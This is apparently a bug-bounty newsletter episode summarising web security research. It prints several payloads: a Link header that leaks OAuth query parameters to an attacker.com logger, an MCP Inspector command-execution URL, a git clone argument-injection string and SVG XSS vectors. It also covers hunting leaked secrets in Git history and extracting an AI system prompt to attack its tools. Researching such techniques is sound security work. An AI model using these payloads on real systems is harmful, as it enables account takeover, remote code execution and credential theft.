[HackerNotes Ep. 121] Slonser's Image Injection 0-day - ATO & New Caido Collab Plugin

A Chrome 0 day allowing IMG injection to query parameter leak, a writeup by Sharon Brizinov that netted 64k in bounties by searching Git repos for secrets, a tool drop featuring Subdomain link launcher & Drop for Caido, MCP Protocol Research, NahamCon and content from Pliny leaking the system Prompt Gemini-2.5-pro With Canvas plus a whole lot more.

Author

gr3pme
May 09, 2025

Hacker TL;DR

  • IMG Injection → Query param leak: Some neat research from @Slonser_ that can let you use HTMLi’s and IMG src injections to leak full URL query parameters via Link headers, ie Link: <https://attacker.com/log>; rel="preload"; as="image"; referrerpolicy="unsafe-url" - Full writeup on how this works below.

  • How I made $64k from deleted files — a bug bounty story: A great writeup by Sharon Brizinov that netted 64k in bounties by searching Git repos for secrets. Some great takeaways from this one include:

    • Deleted files may still exist: When you git rm or delete a file in Git, it’s not really gone - just unlinked from commits, and Git stores those files in the repo for ~2 weeks before garbage collection kicks in.

    • Check binaries for secrets: Apparently people love to commit certs, keys, DB dumps, tools and so on in binary formats. A lot of tooling and manual reviews don’t dig deep into binary formats, and can leave a lot of secrets on the table.

      • And a bunch more below. Be sure to check it out.

  • Tool Drop: Subdomain link launcher & Drop: The guys have been busy creating some tools for us, including a subdomain link launcher to launch a bunch of dorks and common searches on a subdomain and ‘Drop’; a Caido plugin that lets you easily send requests, responses, m&r rules and so on to friends. Check them out below:

  • MCP Protocol Research: @atomicbyte_ and @J0R1AN dived into the MCP protocol and found some pretty heavy-hitting findings, including methods for CSRF to RCE, DNS rebinding, Git Clone Argument Injection to Remote RCE and a bunch more.

  • NahamCon: It’s that time of year again, NahamCon is rolling round, and it’s a stacked lineup. Day 1 focuses on AI, and day 2 focuses on bounty and web hacking. Check out the full tracks here:

  • System Prompt Gemini-2.5-pro With Canvas + Effective Prompting: Pliny is back and dropped the full system prompt for Gemini 2.5 pro. We’ve also got some tips and effective prompts for dev-related tasks.

  • And as always, there’s more below.

ThreatLocker Cloud Control leverages built-in intelligence to assess whether a connection from a protected device originates from a trusted network.

By analyzing connection patterns from protected computers and mobile devices, it automatically identifies and allows trusted connections.

Find out more here:

A quick shout out - if you’re hungry for more quality content starring Justin, look no further. Our boy has starred on Wiz’s podcast, and this time it’s Justin being interviewed instead of doing the interviewing. Check it out below:

This one was pretty wild, I have even popped it myself since the research dropped. Slonser dropped a technique which turned out to possibly be a Chrome 0-day (thank you, Slonser) that allows you to set a referer policy through an IMG that gets inherited on the injected page.

If you’ve ever been in a situation where you only have HTMLi or control the src and nothing else of an image - quite a common scenario - you could exploit this yourself. For example: 

<img src="https://attackercontrolled.com" alt="ctbb" width="500" height="600">

Before we delve into the research, it's important to note a browser behaviour change from a few years ago: to prevent query parameter leaks, Referer headers now only send the origin. For example, your logs for the image above would solely display: 

Referer: https://somesite.com

Now, if this image instead sets a Link header and included it on responses, ie: 

Link: <https://attacker.com/log>; rel="preload"; as="image"; referrerpolicy="unsafe-url"

This instead allows for a full URL leak rather than just the origin, as the image sets a link header along with a referrer policy set to unsafe-url, essentially instructing the browser to send the entire URL, including query parameters, ie: 

Referer: https://somesite.com/login?code=code123&state=state123

To be clear, this would be used in a chain whereby you could redirect an OAuth flow, or something else sensitive in a URL, onto a page that has an HTMLi or an img with a source you can control. That image could then set the Link header and leak the URL via the Referer header.

Interestingly, these preloads can also return link headers, allowing you to recursively set them.

A side note on this, too - this means you could also use this as a primitive for CSRF, as Link and preload headers also send cookies. You could even abuse it to brute force an ID that is unknown to an attacker in a similar scenario, too.

After the trusty clientside CTBB community followed up in the Discord, it turns out it’s actually wider spread than just img tags. Justin hijacked the CTBBpodcast X account and dropped a tweet on it summarising a lot of the findings here: https://x.com/ctbbpodcast/status/1919501924862214577

How I made $64k from deleted files — a bug bounty story

This one’s a great reminder that "deleted" doesn't mean gone, especially in Git. Sharon took a deep dive into Git history, and what he found was wild enough to earn him $64,000 in bounties.

The writeup is great, and if you’re looking for some TL;DR takeaways from it:

Deleted Git Files Still Exist (For a While)

When you git rm or delete a file in Git, it’s not really gone - just unlinked from commits, and Git stores those files in the repo for ~2 weeks before garbage collection kicks in and removes them.

So if you’re looking to check for this on a target, run git log --all -- <file> or git rev-list --objects --all | grep <keyword> to find old/deleted files.

Binary Files = Secret Goldmines

Apparently people love to commit certs, keys, DB dumps, tools and so on in binary formats. A lot of tooling and manual reviews don’t dig deep into binary formats, and can leave a lot of secrets on the table.

Be sure to check out binary files with binwalk, strings, or even extract ZIPs embedded in binaries. Also, be sure to use the -a flag when grepping to treat binary files as text, and be able to search for stuff effectively.

TruffleHog FTW + Most Impactful Secrets

Sometimes you don’t need to overcomplicate it and use what’s already there. Trufflehog was used throughout to scan for secrets, with some of the most impactful secrets detected being (taken from the blog):

  • GCP Projects/AWS Production tokens — $5k–$15k 🔥🔥🔥

  • Slack tokens — $3k-$10k 🔥🔥

  • Github tokens — $5k-$10k 🔥🔥

  • OpenAPI tokens — $500–$2000 🔥

  • HuggingFace tokens — $500–$2000 🔥

  • Algolia Admin tokens — $300–$1000 🔥

  • Email SMTP credentials — $500–$1000 🔥

  • Platform-specific developer tokens and sessions — $500–$2000 🔥

Sharon also had a neat use case for AI to match GitHub accounts to companies, speeding up the recon process. Pretty cool. Check out the full research below:

New tool from the guys. Quick and easy - put in a subdomain, launch a bunch of resources and dorks for it, including:

  • Google site search

  • GitHub domain search

  • Wayback Machine (historical snapshots)

  • Shodan (exposed services)

  • SecurityTrails (DNS history and subdomains)

  • Censys (certificates and infrastructure)

  • crt.sh (certificates)

  • ChatGPT (search the web for anything interesting about this domain)

We also have the launch of ‘drop’ - a Caido plugin that lets you ‘drop’ requests, responses, match & replace rules to your pals, in Caido, without any extra faff. Pretty neat, and I can’t wait to spam Justin with it.

MCP research has been on my checklist for some time now, and seeing this made me kick myself a little. @atomicbyte_ and @J0R1AN dived into the MCP protocol and found some pretty heavy-hitting findings.

Some of the findings are pretty insane, including:

Inspector Proxy = CSRF to RCE

MCP’s “Inspector” debug tool binds to 0.0.0.0, not 127.0.0.1, exposing it to the LAN. This means you can hit it with GET requests with something like /sse?command=calc.exe to launch system commands via the browser..

Yeah. Crazy.

DNS Rebinding = Localhost Exploitation

DNS rebinding isn’t a new technique, but the research used it in quite a nice way by abusing it to trick browsers into talking to MCP servers on 127.0.0.1 or 0.0.0.0.

This allowed for full interaction with local APIs such as /sse and /message . One example given above as to how this can be abused, but if he exposed MCP server has sensitive tools (ie eval, os.system, git clone, browser automation), an attacker can:

  • RCE via exposed functions.

  • File reads (via file://).

  • Data exfil or tool misuse (e.g., auto-trading, scraping, workflow execution).

Git Clone Argument Injection = Remote RCE

One exposed server allowed users to clone arbitrary repos via git clone - by injecting a lovely little payload of -ush -c “cmd” as an argument, they managed to get RCE.. crazy I know.

The research details a few more impactful vectors they found, and it’s pretty crazy that this stuff is out on the internet. Check out the research below:

It’s that time of year again, NahamCon is rolling round, and it’s a stacked lineup. Day 1 focuses on AI, and day 2 focuses on bounty and web hacking:

Some familiar names and exciting talks. Check out the full NahamCon lineups below:

Pliny is back with a system prompt leak from Gemini-2.5-pro. This one is interesting to me as there are quite a lot of things to be gained from prompts, and understanding how a lot of these big models are prompted has helped me craft my own.

Equally, dumping the system prompt will give you a clear-cut path to the tools in use on the prompt and help you hack it a lot easier. The prompt is HUGE, so I’m not gonna paste it in here, but check out the tweet from Pliny detailing it below:

Effective Prompting

On that note, if you’re using AI to write code, instead of giving it a vague description of what you want, give it 90-100% of the description with a product description.

If you’re looking for an effective prompt to help build the PRD draft to refine, I have personally used this one with some luck: 

I want to build an app that [your core app idea in 1-2 sentences, e.g., 'helps users track their daily water intake and sends reminders']. Act as a product manager and generate a draft Product Requirements Document (PRD) for this application. Include sections for Introduction/Goals, Target Audience, Core Features, User Stories, Technical Considerations (suggest a common stack like Python/Flask or Node.js/React if I don't specify), and Non-Functional Requirements.

Once you have this PRD built out, give it to a model to do a lot of the heavy lifting and dev.

On the topic of models, if you’re looking for something that is lightweight to run and relatively smooth to use for small tasks, check out Qwen3-8b. Rez0 mentioned it’s probably the best local model for security and privacy-conscious people out there, and small enough to run on OK hardware.

I try to read all of Gareth’s content, and some of his tweets go out that make me wonder how on earth he managed to create a payload as creative as he has, for example:

This blog peels back some of that wonder, and details some behaviour he discovered through event handlers and noticed a subtle but powerful difference in SVG event binding - a potential path to sandbox escape or DOM leakage.

Some takeaways from this one:

SVG Event Handlers Use evt, Not event

Most HTML elements use event as the parameter in inline event handlers, but SVG events use evt instead (e.g., <svg onload=alert(evt)>).

DOM Leaks via evt.composedPath()

In Chromium-based browsers, evt.composedPath() gives access to the full event path stack, meaning you can chain it to reach the global window context: <svg onload=evt.composedPath().pop().defaultView.alert(1)>

In Firefox, we can use explicitOriginalTarget to get the document object: <svg onload=evt.explicitOriginalTarget.ownerDocument.defaultView.alert(1)>

Research on weird and interesting behaviour like this always comes in useful, especially when it’s from Gareth. Full research can be found below:

Great episode this week. As always, keep hacking!